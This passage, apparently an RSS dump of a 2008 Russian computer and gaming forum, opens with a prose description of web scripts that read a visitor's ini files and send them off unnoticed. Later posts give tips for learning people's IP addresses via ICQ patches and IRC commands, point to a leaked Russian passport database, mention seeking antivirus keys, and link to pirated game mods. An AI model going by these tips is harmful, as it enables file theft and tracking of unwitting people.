пользователя . <br />Поиск и считывание ini файла с машины пользователя . </p> <p>В последнем примере скрипт точно определяет имя системной папки, содержащей ini файлы и читает один из них. Прочитанное содержимое файла может быть без труда отправлено на другой сервер без ведома пользователя. </p> <p>Таким образом, с машины ничего не подозревающего любителя посидеть в инете, могут &quot;утекать&quot; файлы содержащие важную информацию, начиная от рабочих DOC файлов, и заканчивая ini файлами, содержащими пароли. </p> <p>Более того, не составляет труда разработать целую систему, которая будет интерактивно работать с хакером, и которая будет позволять ему работать с вашим диском как со своим собственым. </p> <p>Поразительно то, что около половины хостов при этом даже не будут подозревать об утечке информации, так как их браузер даже не предупредит о несанкционированном запуске опасных объектов.</p> mybb@mybb.ru ([220v]) Fri, 13 Jun 2008 22:25:36 +0400 http://ruscomp.forumbb.ru/viewtopic.php?pid=18#p18 http://ruscomp.forumbb.ru/viewtopic.php?pid=17#p17 <p>по ICQ </p> <p>1. Существуют патчи, позволяющие показывать IP-адрес. Патч для icq 2001b (<a href="http://www.demention3d.narod.ru/soft/icq_patch.rar" rel="nofollow" target="_blank">http://www.demention3d.narod.ru/soft/icq_patch.rar</a> ) build 3659, Патч для ICQ 2002a Beta Build #3722&#160; ( <a href="http://debugger.by.ru/razno/icq2002a_ip.zip" rel="nofollow" target="_blank">http://debugger.by.ru/razno/icq2002a_ip.zip</a>) для показа IP Добавляет в аське в окне свойств юзера окошко в котором показывается IP. (Сделал DeBugger(<a href="http://debugger.by.ru/" rel="nofollow" target="_blank">http://debugger.by.ru/</a>) )</p> <p>2. IP можно узнать посмотрев все соединения, при помощи netstat.exe описание на примере Odigo смотри тут </p> <p>3. На сайте <a href="http://www.leader.ru" rel="nofollow" target="_blank">http://www.leader.ru</a> есть такая фишка: UIN Locator, вводиш номер и получаешь IP, надо только чтобы чел был в онлайне. <br />Узнаем IP через IRC <br />/dns nick - узнать IP машины пользователя по нику &quot;nick&quot;;<br />/ctcp nick clientinfo - узнать информацию о IRC-клиенте &quot;ника&quot;;<br />/ctcp nick time -узнать время которое установлено на его машине; </p> <p>Так же можно использовать Способы как в html-чате )</p> mybb@mybb.ru ([220v]) Fri, 13 Jun 2008 22:20:26 +0400 http://ruscomp.forumbb.ru/viewtopic.php?pid=17#p17 http://ruscomp.forumbb.ru/viewtopic.php?pid=15#p15 <p>Виж у что сюда за ссылками постоянно лезут люди, так положите сюда спасибо чоли... а то помогаю а так... паршива что не знаешь кому)<br />а лучше регайтесь и поддержите форум</p> mybb@mybb.ru ([220v]) Fri, 13 Jun 2008 22:06:44 +0400 http://ruscomp.forumbb.ru/viewtopic.php?pid=15#p15 http://ruscomp.forumbb.ru/viewtopic.php?pid=14#p14 <p>я лично пользуюсь каспером 6, не нагружает иситему правда нынче трудновато искать свежие ключи</p> mybb@mybb.ru ([220v]) Thu, 05 Jun 2008 21:32:57 +0400 http://ruscomp.forumbb.ru/viewtopic.php?pid=14#p14 http://ruscomp.forumbb.ru/viewtopic.php?pid=13#p13 <p><a href="http://soft.softodrom.ru/scr/rasdel.php?ras=8" rel="nofollow" target="_blank">http://soft.softodrom.ru/scr/rasdel.php?ras=8</a> вот чем полльзуюсь с завид ным постоняством, всего и понемногу<br /><a href="http://cjcity.ru/soft/" rel="nofollow" target="_blank">http://cjcity.ru/soft/</a> сайт с различными программами для создания музыки</p> mybb@mybb.ru ([220v]) Thu, 05 Jun 2008 11:34:54 +0400 http://ruscomp.forumbb.ru/viewtopic.php?pid=13#p13 http://ruscomp.forumbb.ru/viewtopic.php?pid=12#p12 <p>фото и видео которые оставляют тебя в акуе или желании блевануть<br /><a href="http://spynet.ru/video/12556-pjanyjj-popal-pod-poezd.html" rel="nofollow" target="_blank">http://spynet.ru/video/12556-pjanyjj-po &#8230; poezd.html</a><br /><a href="http://spynet.ru/shoked/11845-krasota-jeto.html" rel="nofollow" target="_blank">http://spynet.ru/shoked/11845-krasota-jeto.html</a><br /><a href="http://spynet.ru/shoked/12292-devchonki-fotkajut-sami-sebja-39-foto-18.html" rel="nofollow" target="_blank">http://spynet.ru/shoked/12292-devchonki &#8230; to-18.html</a></p> mybb@mybb.ru ([220v]) Thu, 05 Jun 2008 11:28:52 +0400 http://ruscomp.forumbb.ru/viewtopic.php?pid=12#p12 http://ruscomp.forumbb.ru/viewtopic.php?pid=11#p11 <p>сюда ссылки с интерент приколами и наепками)))<br /><a href="http://spynet.ru/pasport/" rel="nofollow" target="_blank">http://spynet.ru/pasport/</a> - выложена новая база паспортов россии, тама каждый есть))</p> mybb@mybb.ru ([220v]) Thu, 05 Jun 2008 11:06:33 +0400 http://ruscomp.forumbb.ru/viewtopic.php?pid=11#p11 http://ruscomp.forumbb.ru/viewtopic.php?pid=10#p10 <p>Сюда выкладываем офигенно морные видиои в названии поста подписываем примерную направленность</p> <p><a href="http://video.online.ua/8/10720.php" rel="nofollow" target="_blank">http://video.online.ua/8/10720.php</a>&#160; исполнение танца живот двухгодовалым ребенком=)<br /><a href="http://video.online.ua/8/10704.php" rel="nofollow" target="_blank">http://video.online.ua/8/10704.php</a> мента обосрали бо жти коровки!!!)) ваще реальный замор)))) <br /><a href="http://video.online.ua/8/10665.php" rel="nofollow" target="_blank">http://video.online.ua/8/10665.php</a>&#160; американский световой флеш моб<br /><a href="http://video.online.ua/8/10677.php" rel="nofollow" target="_blank">http://video.online.ua/8/10677.php</a> офигенное видео про силачей, советую Всем +5 от меня)))<br />чуть позже дам еще)))<br /><a href="http://spynet.ru/video/12556-pjanyjj-popal-pod-poezd.html" rel="nofollow" target="_blank">http://spynet.ru/video/12556-pjanyjj-po &#8230; poezd.html</a> акуенно, пейте алкоголь больше</p> mybb@mybb.ru ([220v]) Wed, 04 Jun 2008 21:25:18 +0400 http://ruscomp.forumbb.ru/viewtopic.php?pid=10#p10 http://ruscomp.forumbb.ru/viewtopic.php?pid=9#p9 <div class="quote-box answer-box"><cite>&#91;220v написал(а):</cite><blockquote><p>]кульная группа, когда играю в кс или другую экш игру всегда включаю что-то именно в этом духе))</p></blockquote></div><p>Палюбому... Под это кул играть)</p> mybb@mybb.ru (MustanG) Sat, 31 May 2008 21:28:58 +0400 http://ruscomp.forumbb.ru/viewtopic.php?pid=9#p9 http://ruscomp.forumbb.ru/viewtopic.php?pid=7#p7 <p>Вот сопсна.. Разговариваем, делимся интересными штучками и т.д. А также классы, и их прокачка по талантам..</p> mybb@mybb.ru (MustanG) Sat, 31 May 2008 20:42:56 +0400 http://ruscomp.forumbb.ru/viewtopic.php?pid=7#p7 http://ruscomp.forumbb.ru/viewtopic.php?pid=5#p5 <p>юзаем опрос</p> mybb@mybb.ru ([220v]) Fri, 30 May 2008 22:13:31 +0400 http://ruscomp.forumbb.ru/viewtopic.php?pid=5#p5 http://ruscomp.forumbb.ru/viewtopic.php?pid=4#p4 <p>Высказываем свои мнения и пишем рецензии те кто играл в эту игру<br />Или скажите то чего вы ждете от этой игры и потянет ли ваша машиа эту чуду игру?вот в качестве несколько обоев</p> mybb@mybb.ru ([220v]) Fri, 30 May 2008 22:09:20 +0400 http://ruscomp.forumbb.ru/viewtopic.php?pid=4#p4 http://ruscomp.forumbb.ru/viewtopic.php?pid=3#p3 <p>Сервера на которых я играю постоянно:<br />wow.irkgame.ru</p> <p>и вообще все сервера смотрим на <a href="http://www.mmotop.ru/" rel="nofollow" target="_blank">http://www.mmotop.ru/</a></p> <p>Аддоны для wow <a href="http://wowui.worldofwar.net/" rel="nofollow" target="_blank">http://wowui.worldofwar.net/</a> и <a href="http://wow.curse.com/downloads/addons/" rel="nofollow" target="_blank">http://wow.curse.com/downloads/addons/</a><br />(Статью по аддонам можно найти на&#160; <a href="http://wow.bnet.by/index.php?action=printpage;topic=110.0" rel="nofollow" target="_blank">http://wow.bnet.by/index.php?action=pri &#8230; opic=110.0</a> )<br />Клиент Wow лучше качать здесь <a href="http://wow.irkgame.ru/index.php?option=files" rel="nofollow" target="_blank">http://wow.irkgame.ru/index.php?option=files</a></p> <p>Сs 1.6 <a href="http://cs.gamering.ru" rel="nofollow" target="_blank">http://cs.gamering.ru</a> <br />моды для кс<br />дезматч&#160; <a href="http://www.c-s.ru/mods/csdm.zip" rel="nofollow" target="_blank">http://www.c-s.ru/mods/csdm.zip</a><br />суперхероу <a href="http://thepiratebay.org/tor/3421877/Superhero_MOD_CS" rel="nofollow" target="_blank">http://thepiratebay.org/tor/3421877/Superhero_MOD_CS</a><br />позже выложу еще несколько<br />подскажите какие еще сервера хорошие есть...</p> mybb@mybb.ru ([220v]) Fri, 30 May 2008 21:59:34 +0400 http://ruscomp.forumbb.ru/viewtopic.php?pid=3#p3 http://ruscomp.forumbb.ru/viewtopic.php?pid=2#p2 <p>ИГровая индустрия занимает всё большее место в экономической системе стран, и не менее&#160; быстро заполоняет умы и разумы людей, определим ту игру, которая заполоняет наиболее всехватывающе=</p> mybb@mybb.ru ([220v]) Fri, 30 May 2008 14:47:30 +0400 http://ruscomp.forumbb.ru/viewtopic.php?pid=2#p2